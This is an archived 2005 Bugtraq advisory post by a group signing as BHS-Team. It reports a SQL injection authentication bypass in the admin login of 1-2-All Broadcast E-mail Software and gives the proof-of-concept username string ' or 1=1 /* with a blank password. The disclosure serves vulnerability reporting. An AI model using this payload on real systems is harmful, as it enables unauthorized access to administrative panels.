Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

1-2-All Broadcast E-mail Software vulnerable to a classic SQL admin

From: bhs_team () yahoo com
Date: 11 Nov 2005 19:52:41 -0000
1-2-All Broadcast E-mail Software ( POC )
Supplying the following is sufficient to gain access to the admin control panel:

Target :

http://www.example.com/[12allTarget]/admin/index.php


Username: ' or 1=1 /*
Password: (Nothing)(Blank)


Report By : POPO

From>IRAN> www.Babol-Hackers.com

bhs_team () yahoo com
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team

We Are : POPO + Padeshah  + Black ICE + Ezraeil + UNDERTAKER + Fa0p
Previous By Date Next
Previous By Thread Next

Current thread: